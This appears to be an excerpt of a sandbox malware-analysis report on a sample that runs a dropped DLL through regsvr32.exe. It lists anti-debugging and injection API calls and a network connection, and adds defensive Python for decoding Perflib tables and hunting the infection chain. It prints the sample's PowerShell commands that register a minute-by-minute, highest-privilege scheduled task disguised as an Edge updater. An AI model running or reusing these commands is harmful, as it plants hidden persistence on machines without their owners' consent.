Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004EED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004EED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917306069.00000000027DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2020697105.00000000047C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root PartitionlU
Source: regsvr32.exe, 00000007.00000003.1885973380.0000000005000000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025831243.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.0000000005495000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisors
Source: regsvr32.exe, 0000000E.00000003.1916878513.0000000002D49000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885973380.0000000005000000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Virtual Processor,
Source: regsvr32.exe, 00000007.00000003.1885973380.000000000505B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual ProcessorZ
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partitionty
Source: regsvr32.exe, 00000007.00000003.1739937994.000000000287E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1741891317.000000000287E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: e Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
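The numbered runs above (an index, then a name, then the next index) have the layout of the Perflib counter-name table, the "Counter" value under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\009, which a process ends up holding in memory when it enumerates performance objects; checking that table for Hyper-V objects is one way to probe for a hypervisor. The report shows the strings in regsvr32.exe memory but not what the sample does with them. The following Python is an added example, not code from the report, from Joe Sandbox or from the sample: it decodes a constructed table of the same shape (a subset of the index/name pairs visible above), rejects a truncated one like the cut-off strings in the dump, and lists the Hyper-V objects.

```python
"""Decode a Perflib counter-name table like the one dumped from regsvr32.exe
memory above and list its hypervisor-related objects.

Added example; not code from the report or the sample. SAMPLE_TABLE is a
constructed REG_MULTI_SZ built from index/name pairs visible in the dump; on
a live host the full table is the "Counter" value under
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\009.
"""
from typing import Dict, List


def encode_multi_sz(strings: List[str]) -> bytes:
    """REG_MULTI_SZ layout: UTF-16LE strings, each NUL-terminated, then one more NUL."""
    return "".join(s + "\x00" for s in strings).encode("utf-16-le") + b"\x00\x00"


def parse_counter_table(raw: bytes) -> Dict[int, str]:
    """Split the alternating index/name list into {index: name}, keeping
    registry order (the dump above is in that order, not sorted by index).
    A truncated buffer leaves an odd number of entries; it is rejected rather
    than silently mis-paired."""
    items = [p for p in raw.decode("utf-16-le").split("\x00") if p]
    if len(items) % 2:
        raise ValueError("odd entry count: table is truncated")
    return {int(idx): name for idx, name in zip(items[0::2], items[1::2])}


def hypervisor_objects(table: Dict[int, str]) -> List[str]:
    """Object names carrying the Hyper-V prefix. The per-object counters
    ('Virtual Processors', 'Hypercalls/sec') have no prefix and are not matched."""
    return sorted(n for n in table.values() if n.startswith("Hyper-V"))


def as_dumped(table: Dict[int, str]) -> str:
    """The index+name concatenation the sandbox printed once the NULs are gone."""
    return "".join(f"{i}{n}" for i, n in table.items())


# Constructed from pairs visible in the dump (a small subset of the real table).
SAMPLE_TABLE = [
    "4788", "Hyper-V Hypervisor", "4790", "Logical Processors",
    "4792", "Partitions", "4794", "Total Pages", "4796", "Virtual Processors",
    "4806", "Hyper-V Hypervisor Logical Processor", "4808", "Global Time",
    "4906", "Hyper-V Hypervisor Root Partition", "4908", "Virtual Processors",
    "4972", "Hyper-V Hypervisor Root Virtual Processor", "4984", "Hypercalls/sec",
    "6324", "Terminal Services", "6326", "Active Sessions",
]

if __name__ == "__main__":
    table = parse_counter_table(encode_multi_sz(SAMPLE_TABLE))
    print(as_dumped(table)[:60])
    for obj in hypervisor_objects(table):
        print("hypervisor object:", obj)
```

The caveat for anyone treating these strings as a sandbox check: the Microsoft hypervisor also runs on physical hosts with Virtualization-Based Security, Windows Sandbox or WSL2 enabled, so the presence of Hyper-V counter objects on its own is a weak indicator of a virtual machine.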
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 7_2_02638678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02638678
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 7_2_6C855C30 CreateTimerQueue,CreateEventW,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateEventW,WaitForSingleObject,SetEvent,DeleteTimerQueue,7_2_6C855C30
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 7_2_6C874C20 GetProcessTimes,GetSystemTimes,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,memcpy,ReadProcessMemory,ReadProcessMemory,VirtualQueryEx,memset,GetModuleFileNameExW,K32GetModuleFileNameExW,7_2_6C874C20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 7_2_6C856300 memset,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,RtlAddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtTraceControl,NtSetContextThread,NtClose,7_2_6C856300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 7_2_02636530 SetUnhandledExceptionFilter,GetConsoleWindow,ShowWindow,GetCurrentThreadId,PostThreadMessageA,GetInputState,CreateThread,WaitForSingleObject,CloseHandle,Sleep,7_2_02636530
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 7_2_02638678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02638678
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 7_2_026369D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_026369D5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 7_2_0263AFAE SetUnhandledExceptionFilter,7_2_0263AFAE
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 103.97.176.69 443
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 7_2_02635830 _memset,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,VirtualAllocEx,WriteProcessMemory,GetThreadContext,SetThreadContext,ResumeThread,7_2_02635830
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Desktop\eXIHsSYhOX.exe "C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata\roaming\burlysparrow.dll\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{2f534156-472a-43d2-9350-94580b483ba3}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries) -runlevel highest"
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata\roaming\burlysparrow.dll\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{2f534156-472a-43d2-9350-94580b483ba3}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries) -runlevel highest"
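The two PowerShell command lines above are the persistence step: regsvr32.exe, hosting the dropped DLL, first asks whether a task whose action is regsvr32 /S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll already exists (/i hands the string to the DLL's DllInstall export, /S suppresses message boxes), then registers one under a name modelled on Edge's own updater tasks, repeating every minute at the highest run level. The following Python is an added example, not code from the report, from Joe Sandbox or from the sample, and not a Sigma rule: it runs the checks a hunter would want over process-creation records whose shape is an assumption modelled on Sysmon Event ID 1, built from the two command lines above plus an assumed record of the task firing and a constructed benign control.

```python
"""Hunt for the regsvr32 -> powershell -> Register-ScheduledTask chain above
in process-creation telemetry.

Added example; not code from the report, Joe Sandbox or the sample. The
event shape (parent image, image, command line) is an assumption modelled on
Sysmon Event ID 1. SAMPLE_EVENTS holds the two command lines printed in the
report plus two assumed records: the task later firing under the Task
Scheduler service host, and a benign control registering a genuine-looking
Edge update task (constructed; not how Edge installs its own task).
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Directories a standard user can write to. A DLL handed to regsvr32 /i from
# here is suspect: real COM servers register from Program Files or System32.
USER_WRITABLE = re.compile(
    r"\\(?:users\\[^\\]+\\appdata|users\\public|programdata|windows\\temp)\\", re.I)
# regsvr32.exe loads a DLL and exits; an interpreter child is the DLL's doing.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}
DLL_LOADERS = {"regsvr32", "regsvr32.exe", "rundll32", "rundll32.exe"}
DLL_PATH = re.compile(r"(\S+\.dll)\b", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_register_scheduledtask(cmdline: str):
    """Fields of a Register-ScheduledTask one-liner, or None if it is not one.
    The report shows the inner quotes escaped with a backslash, so plain and
    escaped quotes are both accepted; matching is case-insensitive, as
    PowerShell itself is."""
    if not re.search(r"register-scheduledtask", cmdline, re.I):
        return None

    def grab(pattern):
        m = re.search(pattern, cmdline, re.I)
        return m.group(1) if m else None

    return {
        "execute": grab(r"-execute\s+\\?[\"'](.*?)\\?[\"']"),
        "argument": grab(r"-argument\s+\\?[\"'](.*?)\\?[\"']\)"),
        "task_name": grab(r"-taskname\s+[\"']([^\"']+)"),
        "run_level": grab(r"-runlevel\s+(\w+)"),
        "repeat_minutes": grab(
            r"-repetitioninterval\s*\(new-timespan\s+-minutes\s+(\d+)\)"),
    }


def analyse(events):
    """Return (rule, detail) findings in event order."""
    findings = []
    for ev in events:
        parent, image = basename(ev.parent_image), basename(ev.image)
        if parent == "regsvr32.exe" and image in INTERPRETERS:
            findings.append(("regsvr32_spawns_interpreter", f"{parent} -> {image}"))
        if image == "regsvr32.exe":
            m = DLL_PATH.search(ev.command_line)
            if m and USER_WRITABLE.search(m.group(1)):
                findings.append(("regsvr32_user_writable_dll", m.group(1)))
        task = parse_register_scheduledtask(ev.command_line)
        if not task or not task["execute"]:
            continue
        action = basename(task["execute"])
        name = task["task_name"] or ""
        dll = DLL_PATH.search(task["argument"] or "")
        if action in DLL_LOADERS and dll and USER_WRITABLE.search(dll.group(1)):
            findings.append(("task_action_user_writable_dll",
                             f"{action} {dll.group(1)} (RunLevel {task['run_level']})"))
        # Edge's own update tasks carry this prefix but run MicrosoftEdgeUpdate.exe.
        if (name.lower().startswith("microsoftedgeupdatetaskmachine")
                and not action.startswith("microsoftedgeupdate")):
            findings.append(("task_name_spoofs_edge_update", f"{name} runs {action}"))
        if task["repeat_minutes"] and int(task["repeat_minutes"]) <= 5:
            findings.append(("task_repeats_every_few_minutes",
                             f"{name} every {task['repeat_minutes']} min"))
    return findings


REGSVR = r"C:\Windows\SysWOW64\regsvr32.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"
SAMPLE_EVENTS = [
    # The two command lines from the report (regsvr32.exe -> powershell.exe).
    ProcEvent(REGSVR, PS, r'''"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"'''),
    ProcEvent(REGSVR, PS, r'''"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"'''),
    # Assumed: the task firing later under the Task Scheduler service host.
    ProcEvent(SVCHOST, REGSVR, r"regsvr32 /S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll"),
    # Constructed benign control (not how Edge really installs its task).
    ProcEvent(r"C:\Temp\setup.exe", PS, r'''"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe\" -Argument \"/ua /installsource scheduler\") -Trigger (New-ScheduledTaskTrigger -Daily -At 3am) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{00000000-0000-0000-0000-000000000000}' -RunLevel Highest"'''),
]

if __name__ == "__main__":
    for rule, detail in analyse(SAMPLE_EVENTS):
        print(f"{rule:32} {detail}")
```

On a live host the same confirmation is the Get-ScheduledTask filter the sample itself ran (Actions.Execute equal to regsvr32 with a /i: argument under a user profile), followed by a look at the task definition under C:\Windows\System32\Tasks; the benign control shows why the task name alone is not enough, since the genuine Edge tasks carry the same prefix and the distinguishing feature is what the action executes.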
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
